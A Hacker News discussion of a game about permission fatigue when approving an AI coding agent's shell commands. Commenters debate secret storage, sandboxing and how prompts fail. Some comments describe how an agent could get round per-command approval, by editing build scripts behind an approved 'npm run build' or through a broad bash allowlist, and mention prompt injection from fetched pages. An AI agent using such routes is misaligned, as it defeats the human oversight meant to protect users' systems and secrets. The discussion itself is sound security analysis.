hackernews client

Show HN: Continue? Y/N: A 60-second game about AI agent permission fatigue

356 points, posted a day ago

(llmgame.scalex.dev)

144 Comments

xg15

a day ago

This is amazing!

Currently you can "cheat" by simply denying all requests as quickly as possible. This will give you the "security-conscious engineer" badge and a perfect score in terms of how many requests were processed. (You will get the "overblock" notification, but it's somewhat tucked away at the bottom and the screen still looks as if you won)

I also tried to play as the hustle4lyfe move fast and break things engineer and simply approved as many requests as quickly as possible - turns out, the "malicious command" popups actually slow you down. Mean!

Wirbelwind

19 hours ago

Good catch, this has now been nerfed and this approach has gotten its own title

smaudet

16 hours ago

Actually, the only secure default is to deny everything...how do you know that innocent command is actually innocent?

ssl-3

16 hours ago

A strange game. The only winning move is not to play.

SOLAR_FIELDS

14 hours ago

It’s the security mantra: the safest code is the one you never release. Code that never runs is the most secure code

brendoelfrendo

13 hours ago

A computer is only secure if it remains powered off and airgapped.

HappMacDonald

12 hours ago

Turn off your computer and make sure it powers down

Drop it in a 43-foot hole in the ground

Bury it completely, rocks and boulders should be fine

onionisafruit

10 hours ago

> rocks and boulders should be fine

You’re setting yourself up for a supply chain attack here if you trust whatever rocks and boulders are sitting around. A well-resourced adversary may have placed power supply boulders and wifi rocks in your back yard.

ssl-3

8 hours ago

I keep a large supply of thermite on-hand just to make sure that the computer is completely burned every day after it gets dropped into the pit.

Tomorrow is a new day.

JonathanMerklin

8 hours ago

Straight Outta Lynwood was a great album. One of the CDs that I took out of my case the most often as a struggling nerdling who was still a year or two away from having scrounged up enough spare cash for a secondhand iPod.

yuye

5 hours ago

Virus alert! I've also burned all of my clothes I may have worn any time I was online.

KajMagnus

19 hours ago

Top 18%! I denied everything, unless I could see at a glance that it was safe (like Git diff)

xg15

18 hours ago

Glad I could help. I love the new title :D

progforlyfe

19 hours ago

Just like real life! deny it from doing anything and you're safe :)

spurgelaurels

21 hours ago

Fun game, but it showed the lack of security hygiene employed by the game writer. It said `cat ~/.zshrc` was bad because it would share tokens and secrets, but I would never put secrets into my shell rc.

londons_explore

21 hours ago

Plenty of people would. But then I guess they're in env and probably already available to Claude

isityettime

an hour ago

Just aside from all of the security concerns, this is the wrong place to define global environment variables for zsh in the first place! That would be ~/.zshenv. So even if you're clueless about storing secrets in plain text and exporting them as env vars everywhere, ~/.zshrc should still be clean.

shlewis

10 hours ago

I don't do this myself, but I can also see how many would do this.

arowthway

8 hours ago

Also, there's nothing inherently insecure about feeding secrets to an LLM, it's only one element of the lethal trifecta.

otabdeveloper4

8 hours ago

Having "tokens and secrets" at all is a lack of security hygiene.

nish__

21 hours ago

Where would you put them?

godelski

11 hours ago

Literally anywhere else! Your dotfiles should be publishable to github. If they aren't you're doing them wrong.

A good thing to do is organize. You can actually load different files. Here's a pretty common pattern that you'll find and it'll illustrate how to do other things

  if [[ $(uname) == "Darwin" ]]; then
      source "${INSERT_SOME_DIR}/osx.zsh"
  elif [[ $(uname) == "Linux" ]]; then
      source "${INSERT_SOME_DIR}/linux.zsh"
  fi

You do this for loading based on the operating system. You might want some aliases, commands, or other routines in one but not the other. For example, in my linux one I have stuff for cuda paths. You can do all sorts of things too, like make a (generically named) work file, which you don't publish to github but you load it if it exists. Then you can put all your work related aliases there and not contaminate anything else. Something like `[[ -a ${INSERT_SOME_DIR}/work.zsh ]] && source ${INSERT_SOME_DIR}/work.zsh`.

You shouldn't really load secure keys this way, but others had good answers so I thought I'd at least share a more general pattern since it isn't as well known among the less terminally inclined.

analog_daddy

7 hours ago

Okay. Here is a pattern i follow everywhere in my init files for almost every program. Define two key env vars. $DOTFILES and $ECORP. The first is path to your personal set of dotfiles. The second is path to your corporate specific dotfiles.

On personal pc no need to define the $ECORP var in shell init. On work pc define that var.

based alone on that you can conditionally do almost anything.

- shell source files/aliases

- vim/editors enable disable plugins based on existence of env vars.

- define shortcuts in file manager.

- and i add the following to my main $DOTFILES .gitignore.

  # Any file that contains the following will be ignored.
  # Used to ignore files in corporate environment
  *ECORP*
  *ecorp*

Based on multiple years across different setups, using environment variables was the most reliable option since I have been in places where there are restrictions on where my init files can be placed and having to change a shit ton of paths in my dotfiles or just keeping a different branch for work and personal (and making sure they stay in sync) was too much of a hassle.

Additionally, maintaining hygiene is essential, where I only use a Read Only PAT token on my personal dotfiles in workenv. That way, there is no accidental way I would be able to push from my workenv.
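
A minimal sketch of the conditional loading described above, assuming `$DOTFILES` and `$ECORP` each point at a directory. The `aliases.sh` file name and both function names are illustrative and not taken from the comment:

```shell
# Source a file only if it exists and is readable; never fail otherwise.
source_if_present() {
  [ -r "$1" ] && . "$1"
  return 0
}

# Always load the personal config; load the corporate config only when
# $ECORP is set. aliases.sh is a hypothetical file name.
load_dotfiles() {
  [ -n "${DOTFILES:-}" ] || { echo "DOTFILES is not set" >&2; return 1; }
  source_if_present "$DOTFILES/aliases.sh"
  if [ -n "${ECORP:-}" ]; then
    source_if_present "$ECORP/aliases.sh"
  fi
}
```

On a personal machine `$ECORP` stays unset and the second branch is skipped, so the same init file works in both environments without path edits.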

hk__2

5 hours ago

You’re just splitting your dotfiles into a public and a private part. That’s useful if you want to publish the public part on GitHub, but not everyone wants to do this, and the issue of storing secrets in plain text files remains.

isityettime

15 hours ago

Anywhere else? Password managers have CLIs, operating systems have their own secure storage, and lots of command line apps can store secrets in the OS's secure storage (Windows Credential Manager, Secret Service or KWallet on Linux, macOS Keychain).

Project-specific secrets can be stored locally via something like SOPS or remotely with something like HashiCorp Vault or AWS Secrets Manager.

Applications that have secrets to manage (e.g., Emacs) or are partly about secrets management (e.g., GnuPG, OpenSSH) all store their secrets somewhere else and have secure (not plaintext, sometimes not even on disk) storage options available.

There's no reason to store secrets in plain text in your shell configuration. Practically any choice you can think of is a better one. Even if you did, there's no reason you couldn't store them in a more specific file that ~/.zshrc sources, and let LLM agents read zshrc but block access to the file containing your secrets. (I wouldn't rely on permissions prompts for this, though, lol.)

setopt

21 hours ago

Presumably a CLI-accessible password manager (like `pass`) or a GPG-encrypted file (like a netrc-style `~/.authinfo.gpg`).

freedomben

20 hours ago

I put mine in various AES-encrypted files (like `~/.secrets.aes`) and then source them explicitly when needed with:

    . <(aescrypt -d -o - ~/.secrets.aes)

I have a handful of aliases/functions to make it more smooth, but that's the core.

maccard

19 hours ago

Where are those aliases stored?

freedomben

15 hours ago

The AES encrypted file has some, plus a bunch of exported env vars. I do keep one function in my ~/.bashrc to make it simpler to invoke so I can do `source-secret ~/.secrets.aes`:

    source-secret()
    {
      if [ -z "$1" ]; then
        echo "Need filename to source"
      elif ! [ -f "$1" ]; then
        echo "File '$1' does not exist"
      elif ! which aescrypt >/dev/null 2>&1; then
        echo "Could not find required dependency 'aescrypt'"
      else
        . <(aescrypt -d -o - "$1")
      fi
    }

AnyTimeTraveler

18 hours ago

In that AES encrypted file.

It's a shellscript that they encrypted. They decrypt it and feed the decrypted output immediately into the shell, to be sourced.

That encrypted secrets file could contain any shellscript, so the aliases are stored in there, together with the API-Keys and passwords.

SOLAR_FIELDS

14 hours ago

Another, more secure pattern: have different shell profiles that dynamically inject secrets from a secrets manager. Nix is a good tool for this. You have various shell profile configurations that call your password manager CLI at bootstrap (e.g. a new terminal tab). You authenticate, and at terminal bootstrap the secret is fetched from the password manager and injected into an env var. This has an advantage over the other approaches mentioned here: the secret is never stored at rest on the end user’s machine, only used in flight.
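
A rough sketch of the fetch-at-use idea, narrowed to a single command instead of a whole terminal session. `fetch_secret` is a hypothetical stand-in for whatever password manager CLI you use (stubbed so the sketch runs anywhere), and `with_secret` is an illustrative name:

```shell
# Hypothetical fetcher: replace the body with a call to your password
# manager's CLI. Stubbed here so the sketch runs without one installed.
fetch_secret() {
  printf 'stub-value-for-%s' "$1"
}

# Run a command with a secret injected into that command's environment only.
# Usage: with_secret ENV_VAR_NAME SECRET_ID command [args...]
# The body runs in a subshell, so nothing leaks into the calling shell.
with_secret() (
  var_name=$1
  secret_id=$2
  shift 2
  exec env "$var_name=$(fetch_secret "$secret_id")" "$@"
)
```

For example, `with_secret API_TOKEN demo sh -c 'echo "$API_TOKEN"'` shows the value inside the child process, while `API_TOKEN` remains unset in the parent shell afterwards.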

Hackbraten

21 hours ago

Into `pass`, for example:

https://news.ycombinator.com/item?id=48108207

analog_daddy

7 hours ago

Just curious, any reason to prefer using age (you mentioned that you would prefer it if starting over), over something like keepass? I am currently using keepass-cli and only reason i did not use age even though i found it was that it was new to me and I never heard of it (probably not the best reason, but in this era might be a reasonable thing to stick to devil you know). So curious about your take on this.

socksy

20 hours ago

Weird to make reading zshrc supposedly unsafe when I happily publish it in my public dotfiles repo... Who the hell keeps API keys in it? OTOH it seems like lots of these AI tools keep appending PATH in it so I guess there's a fundamental misunderstanding of shell best practices in the entire AI space...

Additionally, killing the results of `lsof` is _not_ safe - if, say, you have the web page open in firefox, or a client subshell in the agent itself, then boom, there goes firefox and the agent.
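
A sketch of a more cautious lookup, assuming `lsof` is installed: `-sTCP:LISTEN` restricts the match to sockets in the LISTEN state, so a browser tab or subshell that merely has a connection to the port is not returned. The function names are illustrative, and the kill itself is deliberately left to the human:

```shell
# Print the PIDs listening on a TCP port, ignoring client connections.
# -n and -P skip host and port name lookups; -t prints bare PIDs.
listeners_on_port() {
  lsof -nP -t -iTCP:"$1" -sTCP:LISTEN 2>/dev/null
}

# Show what a kill would hit instead of killing anything.
describe_port() {
  pids=$(listeners_on_port "$1" || true)
  if [ -z "$pids" ]; then
    echo "no listener on port $1"
    return 0
  fi
  # Feed PIDs one per line so this works regardless of word-splitting rules.
  printf '%s\n' "$pids" | while read -r pid; do
    ps -o pid= -o comm= -p "$pid"
  done
}
```

Running `describe_port 3000` first makes it obvious whether the target is the dev server or something you would rather keep alive.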

mrgoldenbrown

19 hours ago

Yeah, the game seems to assert that the kill is safe to run because Claude told me it was safe. But that's the point, I'm not supposed to trust Claude.

gwerbin

an hour ago

Likewise I got dinged for denying a random stash-rebase-pop operation. I have no idea what the repo state is like right now. That could be a wild mess of a waste of time. It says I'm doing a refactor, so OK I guess rebase on main is a good idea. But hell no I'm not approving that in the 1 minute before a meeting.

The whole premise IMO is pretty flawed. It's interesting as an ad for the company though.

eranation

11 hours ago

Love it. One nitpick.

>npm config set registry https://npm.internal

>Pointing npm to the company's internal registry mirror as required by onboarding docs

It claimed this is safe and I was 50/50 on it but eventually rejected it.

If this README is for a public / forked repo, and that https://npm.internal is actually https://npm.internal.somethinganexternaldnscanresolve.tld

This can go bad really quickly...

In 99% of cases you would have Artifactory / Nexus (or other mirror) already set by company policy. Having a README tell you to use a different package manager url is a big red flag and seconds away from disaster...

Wirbelwind

7 hours ago

that's a good callout. .internal is a reserved TLD so it shouldn't resolve publicly, but that's a good point about being wary of changing this while letting claude refactor a project for something that's best configured separately. Moving it to permanent mutation!

axod

a day ago

Fun little game, but I think the questions jump context so much it's a little unrepresentative. It might be better to group things into "packs", which have more real-world representative structure to them. For example, lots of "editing something.js" file permission requests, and then an "npm publish" is far more normal, and it's more of a risk, if you're used to pressing Y lots and then suddenly out of the blue...

orsorna

20 hours ago

About three quarters of the "bad" choices are things that not only do I not care about leaking but things that an employer would not punish you for doing, even if it led to a production incident.

gblargg

5 hours ago

I declined things like rm -rf because the path was relative and it wasn't showing me the current directory. How would I know what project it was in?

enether

18 hours ago

The permission thing is a killer to productivity, if you're running Claude I think it's more efficient to just run in a disposable sandbox (like exe.dev[1]) or in some form of docker container with permissions you're personally ok taking the risk with on a personal machine[2]

[1] - https://exe.dev/ is a new cloud provider with some very useful agent UX

[2] - I built https://github.com/stanislavkozlovski/dclaude/ for this; not perfect, but it gets my job done on the rare occasion I need to run the coding agent locally

kvdveer

17 hours ago

A disposable sandbox won't protect you from secret exfiltration. Assuming you don't consider your code a secret, you could of course set up your sandbox so it doesn't have any secrets, but that would severely limit the kinds of tasks you can use the agent for.

iugtmkbdfil834

2 hours ago

<< that would severely limit the kinds of tasks you can use the agent for.

Are we just talking about API calls to providers? If so, wouldn't local agent + sandbox solve all that?

esterna

17 hours ago

On the one hand, you can set up a proxy that supplements secrets for API calls. On the other hand, you can whitelist what you need, in the simplest case with iptables (The devcontainer in the claude code repo is an example of the latter).

trehalose

15 hours ago

I wish the scoring readout at the end would display the LLM's descriptions of the commands I shouldn't have approved. I approved the rm -rf Projects command because I thought the LLM had correctly described that it would delete everything in the Projects folder. Clearly I misread that in my hurry to answer prompts (I knew what the command would do and I guess I hallucinated that the AI had explained it), but I'd like to see what it was that I misread.

Playing this game made me very glad I don't agentmaxx.

progforlyfe

19 hours ago

I got "approve" wrong for `ls -la ~/Documents` but I don't consider simply listing the documents folder a security problem, it's just file names. If it was reading the CONTENTS of them, maybe...

zackify

a day ago

I vibe coded a TUI that just shows running lxd containers

I hit 'n' to toggle all network access minus anthropic and openai URLs.

I use pi (sometimes claude, always on bypass) and I auto allow everything. I only toggle manual approval in rare cases like running a script or command that needs to touch a production system and I need to validate everything.

Normally my container has full write access to staging so it can debug and validate everything on its own

kennywinker

a day ago

Sounds like your process has made you vulnerable to huge classes of exploits and accidents. You have no oversight of changes locally, and only focus on when it touches prod. That means toxic local changes can get in, and if it works in staging why would you look too closely at it before merging to prod? Meanwhile a malicious npm package has made it into your repo, and your staging api keys have been sent to the command and control server.

zackify

18 hours ago

i can view the diff locally but often times after planning with opus i get what i want.

I create a draft pr and manually review all items before then marking ready for review for the team.

So I'm not blindly pushing things to prod without review.

Without staging key access I wouldn't have been able to do a payment provider migration at this speed. iterating by migrating users in staging and being able to use and validate the sdk quickly with opus is a massive time saver.

cobbal

a day ago

That's funny. It told me that blocking "npm run build" was the wrong answer. Maybe it doesn't really understand the threat model.

dns_snek

a day ago

That's a great example of how dangerous actions are perceived as innocent. The entire model of approving specific commands is absolutely bonkers.

npm run build = run an arbitrary shell command written in package.json

Meanwhile the agent could have done any of the following without approval:

- edited `package.json` to contain any arbitrary build command

- planted malicious code in `build.js` (called by `npm run build`)

- planted malicious code in `node_modules/xyz/index.js` (imported by `build.js`)
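
To make that concrete: the approved string `npm run build` stays identical while the file it executes changes. A minimal sketch, assuming a hypothetical review step that records a checksum of `package.json` and treats an earlier approval as stale once the file differs. The function names and snapshot path are illustrative, `cksum` is used only because it is in POSIX (a real check would want a cryptographic hash), and this covers `package.json` alone, not `build.js` or `node_modules`:

```shell
# Record a checksum of the file at the moment a human reviewed it.
# $1 = file to watch, $2 = where to store the snapshot.
record_review() {
  cksum < "$1" > "$2"
}

# Succeed only if the file still matches the reviewed snapshot.
unchanged_since_review() {
  [ -f "$2" ] && [ "$(cksum < "$1")" = "$(cat "$2")" ]
}
```

Usage would look like `unchanged_since_review package.json .reviewed.cksum && npm run build`, which at least ties the approval to the content that was reviewed instead of to the command name.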

nonethewiser

20 hours ago

Yup. The most secure computer is one encased in concrete and dropped into the ocean.

falcor84

18 hours ago

Concrete alone isn't enough, you also need to have it be enclosed in a Faraday Cage.

Wirbelwind

19 hours ago

that's a great point, and also the problem with relying on a human-in-the-loop to catch these kinds of issues when it can be circumvented even if they were perfect

amarant

21 hours ago

What would a better system look like?

xigoi

21 minutes ago

Don’t give a fancy random text generator access to your computer.

dns_snek

17 hours ago

Agents should make better use of OS sandboxing facilities with finer-grained ACLs.

Less: Do you want to run "npm run build"?

More: "npm run build" tried to read your Chrome cookie database, do you want to allow that?

Some agents like Codex use sandboxing on Linux/MacOS but the permissions are far too coarse - they'll run the command in a relatively strict sandbox and when it fails they'll ask you to allowlist the command as a whole, forever. There should be a new permission prompt every time a command tries to do something new.

Claude suggests (or used to suggest - it's been a while) to allowlist "bash" which completely defeats the point. If you do that the agent can run `bash -c "echo literally anything"`
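
A toy illustration of why that defeats the point, assuming a hypothetical allowlist keyed on the first word of the command line. This is not how any particular agent implements its checks; `ALLOWED_COMMANDS` and `is_allowed` are made up for the example:

```shell
# Hypothetical allowlist: commands are approved by their first word only.
ALLOWED_COMMANDS="git ls bash"

# Succeed if the first word of the command line is on the allowlist.
is_allowed() {
  first_word=${1%% *}
  case " $ALLOWED_COMMANDS " in
    *" $first_word "*) return 0 ;;
    *) return 1 ;;
  esac
}
```

With this check, `is_allowed "curl https://attacker.example"` fails as intended, but `is_allowed "bash -c 'curl https://attacker.example | sh'"` succeeds, because the only thing inspected is the word `bash`.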

SOLAR_FIELDS

14 hours ago

Don’t rely on your non deterministic agent and its creators to secure your software. Design defense in depth and trust guardrails that don’t expect Anthropic to vibe good security into existence.

If you start by treating any autonomous actor in your system as an actor with the potential to go rogue the design starts to create itself

nonethewiser

20 hours ago

Not using agents at all. It could edit your code to do something malicious when you run it. Not even once. Not even if the agent has a gun to your head.

conrs

12 hours ago

Yeah, echoing the comments here. It's a good idea - kind of - but it is all about digging deeper when it is sus.

The tool assumes so much. That it is fine to kill a process itself versus just asking you to kill the process. That everyone MUST have passwords in their home directory. It's all meaningless without providing the thing it is running and so no activity is technically safe.

Why do people even get the agent to run the commands it asks to run? You can solve the entire threat vector by running it yourself and giving the agent the output. Claude practically only needs things like sed, awk, and grep. It's a pattern matcher. It's a waste of your (and its) time to have it run your project.

paddycorr

2 hours ago

Love how it always wants to send my packages to a random domain. Has that happened to anyone in practice?

christophilus

5 hours ago

Claude Code has gotten so bad about this that I’ve stopped using it for code reviews. I may look into wiring Claude up to Codex as an alternative LLM just to compensate.

I think the issue is that I’m running Claude Code in a container so it sees that it is root, and becomes a lot more cautious. Not sure, though.

kangalioo

3 hours ago

If you're running Claude Code in a container anyways, why does `--dangerously-skip-permissions` not work for you?

christophilus

an hour ago

Claude Code won't let you do that as root. Codex's equivalent is perfectly fine, though.

Wirbelwind

a day ago

Thanks all for checking it out and your suggestions!

If anyone is curious about the actual underlying risks and problems with some mitigations (like the 17% false-negative rates of Auto Mode), I wrote up a quick summary of some of the approaches here

https://scalex.dev/blog/ai-agent-permissions/

kstenerud

19 hours ago

You might want to check out https://github.com/kstenerud/yoloai

Liftyee

a day ago

I haven't used local agentic AI yet for programming projects. Hence, -187 score

The filter for "commands I would run myself" and "commands I would let an agent run" are very different it seems.

rogerrogerr

20 hours ago

Thinking about agents as remote junior devs who _might_ be North Korean operatives has been the right model for me.

jstanley

5 hours ago

How do you know?

kleiba2

4 hours ago

Is there a light mode by any chance? Unfortunately, I cannot look at light text on black background for more than a few seconds (something must be wrong with my eyes...).

cat-whisperer

an hour ago

these days I rely on auto mode. :) it's like trust-as-a-service

t-writescode

21 hours ago

I was told I was over protective when the text said “I need to wipe and build my project” and its first thing to do was to read the details of the (already established) package file. Why did it need to read the package file to “get context” if it was just doing a standard wipe and build?

Apparently me telling it that’s the wrong first step and saying “no” is bad; but I’ve seen AI tools waste a ton of time doing a bunch of random work before they do their job.

ghrl

a day ago

I am mostly using OpenCode and barely ever see a permission prompt. While they do enforce it for outside workspace read/write, with the bash tool the agent can just bypass that. I'm not quite sure why it is that way, and it certainly isn't a very good solution, but it's likely not worse than asking for everything, which just trains the user to always accept and then provides a false sense of security.

madrox

17 hours ago

I've long held that the current agent permission model is like playing a game of "Papers, Please", and that most permission models engineers implement in their own AI products are more a measure of how trusting the user is with AI than an actual permission check.

I'm of the view that future controls should be more about approving plans and rewinding durable workflows as models get better at avoiding egregious mistakes.

cyanydeez

16 hours ago

The models will never avoid egregious behavior. Think of it like every "good intentions" morality tale: there's almost always some genuine context where that behavior is wanted.

Instead, the coding harness, or some deterministic tool, will need hardcoded security features.

In opencode, almost all the power comes from bash, and all other permissions are just charades. It's powerful, and insecure because of it.

You can sandbox them, but then you fight the sandbox to pipe in your assets. The sandbox becomes porous because otherwise it's useless.

MCPs don't address much either.

What we are looking for is a portal or protocol that has the model, the harness, and the actions tunneled, like ssh, to some fixed-scope, limited shell alongside the assets.

Then the user and the LLM can negotiate assets and actions as needed via the protocol.

But alas, as your comment suggests, people think there's some perfect context that'll prevent bad things from happening. The libertarian paradise without regulation.

madrox

15 hours ago

I think you're choosing to ignore what I said about the implication of durable workflows, because you seem to be inventing some stories about my comment.

I find that well documented plans do pretty well at aligning AI to what I want it to do, and if it does go astray, as you rightly point out it can still do, it would be sufficient if I can undo it with little pain. We do this kind of thing all the time in CI/CD pipelines.

Even humans can take down production. We have all kinds of guards in place to empower while also defending against the intern accidentally dropping the DB.

hanwenn

8 hours ago

I got tired of the permission prompts and wrote a filesystem/network sandbox so I could skip all permission checks. It works on the same principle as bubblewrap, but has some niceties to separate Claude from its credentials. See https://github.com/hanwen/runclaude

ashm1104

9 hours ago

Damn this is so cool, this has the potential of being a like textbook pre training/post training quiz. Congratulations.

MeetingsBrowser

a day ago

It would be cool to see the distribution of all player scores.

Wirbelwind

a day ago

That's a great idea, stay tuned

Wirbelwind

19 hours ago

and added! Made one for each stat separately

whimblepop

21 hours ago

I got "overblocked" for this one:

  rm -rf node_modules && npm install

but actually if you're only removing `node_modules` and you have a working package-lock.json already, what you want is `npm ci`; `npm install` can mutate package-lock.json and potentially expose you to supply chain attacks. If you use `npm ci` I think you don't need to `rm -rf node_modules`, either.

Anyway you should generally run `npm ci` except when you're deliberately updating your actual dependencies. I'd only permit an `npm install` if I was adding or updating a dependency, or I'd just reviewed an `npm ci` failure.
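
A small sketch of that rule of thumb, assuming the decision is based purely on whether a lockfile exists. `install_command` is an illustrative name. Per npm's documentation, `npm ci` requires a `package-lock.json` or `npm-shrinkwrap.json`, never writes to it, and removes an existing `node_modules` before installing:

```shell
# Print the install command to use for the project directory in $1.
# With a lockfile present, prefer the reproducible `npm ci`.
# Without one, `npm install` is the only option and deserves human review.
install_command() {
  if [ -f "$1/package-lock.json" ] || [ -f "$1/npm-shrinkwrap.json" ]; then
    echo "npm ci"
  else
    echo "npm install"
  fi
}
```

Calling `install_command .` in a project with a committed lockfile prints `npm ci`, which also makes the separate `rm -rf node_modules` step unnecessary.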

gamer191

21 hours ago

But also why would Claude need to run `rm -rf node_modules && npm install`? Without the context of seeing what changes it’s made, I’d be inclined to assume that Claude has added a new dependency, which I definitely don’t wanna blindly trust it to install

Wirbelwind

19 hours ago

thanks for the pointer! renamed it to npm ci so it's still 'safe'

kqr

a day ago

Fun! Played twice and refused all dangerous commands, with only one "over-block". Although I disagree that saying no to `kill $(lsof -t -i:3000)` is over-blocking. It's such a simple command I'd rather run it myself and be fully aware of what process I'm killing.

nardib

a day ago

Use this and save yourself:

claude --dangerously-skip-permissions

tasuki

a day ago

Just make sure to run it in an isolated environment where it's ok to mess things up, and make sure it doesn't have access to any secrets.

wildpeaks

a day ago

This is why having a human in the loop isn't enough because they will cut corners and skip reviewing what they should review.

preciousoo

a day ago

I created a watcher for this problem, to watch my PRs for unfinished scope and have a fresh Claude review

Uses tmux and gh https://github.com/Kyu/claude-pr-watch

chuckadams

a day ago

A tool that pushes people into permissions fatigue is in fact the proper recipient of the blame. The tool in question here is the entire system though, including the OS with insufficient permission boundaries in userspace, not just the agent

kennywinker

a day ago

A tool that bypasses permission requests because they’re annoying will be just as guilty when the repo is poisoned.

chuckadams

20 hours ago

I'm not saying wedging doorstops under the fire doors is a good thing, I'm just saying look at the situation that's making people put the doorstops there. Or something, it's not a great analogy. I'm just saying that shaming the user belongs with obscurity in the list of security mechanisms that don't work out in practice.

kennywinker

a day ago

It’s baking malicious code into your project, but hey it didn’t run rm -rf so… we’re good.

maxbond

21 hours ago

Why would you do this now that we have auto mode?

qsxfthnkp2322

a day ago

I love it when Claude is dangerous

paulddraper

a day ago

  alias yolo='claude --dangerously-skip-permissions'

dheera

a day ago

I got tired of typing that and just do

    alias claude="claude --dangerously-skip-permissions"

I do have a separate "claude" user on my system without sudo access and without access to my main user home dir

And yeah I know that's not perfect but I'm trying to get shit done

franze

a day ago

alias claude+="claude --dangerously-skip-permissions"

alias claude++="claude --dangerously-skip-permissions --continue"

kuboble

8 hours ago

I was so tired of all those approvals that I switched to Yolo mode exclusively.

Claude works in his own separate vm with root access, git remote set to my local copies of repository no github access etc.

I think he could still hurt me if he really wanted, but most scary stories I heard were about LLM making really bad judgements rather than actively trying to break out and do harm.

soanvig

a day ago

Fun game. Can somebody run an agent against those questions to see how it performs? :)

sandeepkd

a day ago

Interestingly, I kept saying no to everything and somehow I am a security-conscious rare engineer who actually read the commands. Guess doing nothing is the safest approach from a security standpoint.

sukhavati

a day ago

Reminds me of the "Papers, please" game. Glory to Arstotzka!

kstenerud

19 hours ago

This is one of two reasons why I wrote yoloAI. I never get these permission prompts anymore. It feels a lot like after installing an adblocker.

ericlevine

16 hours ago

This really hits the nail on the head. The current permissions models are totally broken IMO. You're either approving everything, restricting access and neutering your agent, or full YOLOing and, well, good luck. The right primitives are not in place yet, and there's no clearly correct answers.

I think the right primitive is "task-based authorization", where you review a high-level task and let an LLM judge decide whether the subsequent tool calls fall into the scope of that task. It's not perfect, but it distills dozens of approvals down to one and gives you risk-based signals of whether you should pay close attention or not.

misbau

a day ago

That was fun and gave me an idea how security conscious I am.

NewJazz

a day ago

git reset --soft HEAD~1

Uh, how is this an overblock? It is literally a destructive command. No way I want an LLM agent rewriting my commit history. What if that commit was already pushed to a protected branch?

stratos123

21 hours ago

Why do you call it destructive? It rewrites history only locally and reversibly (the disappeared commit is still in reflog and can be recovered with another reset) and also doesn't destroy uncommitted changes, so it's quite safe. You can only lose data with it by resetting an unpushed commit and then waiting long enough to let the unreferenced commit be garbage collected.
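
The recovery path can be sketched in a throwaway repository, assuming `git` is installed. `demo_soft_reset_undo` is an illustrative name, and the identity and signing settings exist only so the commits succeed on any machine:

```shell
# Show that a soft reset is reversible through the reflog.
# Everything happens in a temporary repository.
demo_soft_reset_undo() {
  repo=$(mktemp -d) || return 1
  (
    cd "$repo" || exit 1
    git init -q .
    git config user.name "demo"
    git config user.email "demo@example.invalid"
    git config commit.gpgsign false
    echo one > file.txt && git add file.txt && git commit -q -m "first"
    echo two > file.txt && git add file.txt && git commit -q -m "second"
    before=$(git rev-parse HEAD)
    git reset -q --soft HEAD~1       # "second" drops off the branch
    git reset -q --soft 'HEAD@{1}'   # the reflog still remembers it
    after=$(git rev-parse HEAD)
    [ "$before" = "$after" ] && echo "recovered"
  )
}
```

This only works while the reflog entry is still around; once it expires and the unreferenced commit is garbage collected, the second reset has nothing to point at.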

NewJazz

20 hours ago

Commit history is data. I might not realize what happened until the gc happens.

eqvinox

18 hours ago

A bit too JavaScript specific... can't really play if you don't know that ecosystem.

mrweasel

2 hours ago

It suggests that "kill $(lsof -t -i:3000)" is completely safe, which it isn't if you don't know what runs on that port. Maybe some JavaScript framework runs on that port, I don't know, but neither does the AI. The developer may have moved it because something important already runs on that port.
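
One way to narrow that gap is to look at who owns the port before killing anything. The sketch below is only an illustration: it assumes field-style output such as `lsof -F pc` produces (one field per line, `p` before a PID, `c` before a command name), and both function names and the sample strings are invented.

```python
def parse_lsof_fields(output: str) -> list[tuple[int, str]]:
    """Parse field-style lsof output into (pid, command) pairs.

    Assumes one field per line, 'p' prefixing a PID and 'c' a command name;
    lines with any other prefix are ignored.
    """
    owners, pid = [], None
    for line in output.splitlines():
        if line.startswith("p") and line[1:].isdigit():
            pid = int(line[1:])
        elif line.startswith("c") and pid is not None:
            owners.append((pid, line[1:]))
            pid = None
    return owners


def pids_safe_to_kill(owners, expected_commands):
    """Return PIDs only if every process on the port is one we expected."""
    if all(cmd in expected_commands for _, cmd in owners):
        return [pid for pid, _ in owners]
    return []  # something unexpected holds the port: ask the human instead


sample = "p4242\ncnode\nf23\n"
dev_server = pids_safe_to_kill(parse_lsof_fields(sample), {"node"})
database = pids_safe_to_kill(parse_lsof_fields("p77\ncpostgres\n"), {"node"})
```

Here `dev_server` contains the one `node` PID, while `database` is empty because `postgres` was not in the expected set. A command name alone is a weak signal, so this reduces the risk rather than removing it.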

martin-adams

21 hours ago

Very fun. I can only imagine that building this with Claude, and testing it, needed a bit of mental concentration.

graphememes

20 hours ago

Pressed 1 for everything, no regrets

sevenseacat

a day ago

Continue? Y/N ── SCORE: 2,343 Security-Conscious Engineer

Caught 8/8 threats "Not a single secret leaked"

→ llmgame.scalex.dev

neogodless

20 hours ago

Continue? Y/N ── SCORE: 1,549 Security-Conscious Engineer

Caught 3/3 threats "Not a single secret leaked"

So are there 3 threats? 8? Is it a different game?

Does everyone get a "good" score even if they missed 5 threats?!

t-writescode

19 hours ago

It's a game you play over one minute. They probably saw more prompts than you.

stevenalowe

21 hours ago

Sadly unplayable - gray text on a black background is very hard to read on a phone

bspammer

a day ago

To be realistic, 99% of the time it should be a totally innocuous command. If half of the commands are dangerous then you don't get fatigue because you're aware what you're doing is dangerous.

hastily3114

9 hours ago

This is cool. Could be used for training. But it's a bit too easy when it's a game where you are expecting dangerous commands. The real fatigue comes from accepting hundreds of obviously safe commands during a work day. Then it's easy to start accepting everything without really reading it.

carterschonwald

a day ago

some of the sandboxing ive been playing with gives me the best of both yolo and like logic programming tier perms on llm actions in env. still not ready for prime time though ;)

ilaksh

a day ago

You can turn that off with an option in most agents.

My own agent harness/framework has never had any permission system. It's also never deleted anything it shouldn't or done anything crazy or unrelated to what I asked.

flux3125

a day ago

> It's also never deleted anything it shouldn't or done anything crazy or unrelated to what I asked

Until it does. A simple curl request to a compromised website could inject a malicious prompt into it.

fragmede

a day ago

How many car accidents have you been in, and do you wear your seatbelt when you're in a car?

cadwell

a day ago

1,640 points on my first try—I fell into a few traps, but it was really interesting. Thanks for the little game! I'm sharing it with my coworkers :)

hcks

8 hours ago

PSA: not making safe environments where you can skip all permissions and instead wasting time monitoring agents == incompetence

rvz

a day ago

This current thread is proof of AI psychosis.

stuartjohnson12

a day ago

What the hell is going on in this thread? This isn't good. The "threats" don't make sense. Oh no, all the sensitive information in my package.json...

cobbal

21 hours ago

Here's the threat model I (a luddite) use to evaluate these. The claude code harness can be mostly trusted, the model cannot be trusted because it is exposed to untrusted data from the internet, and there is no separation of data/code in an llm [0][1].

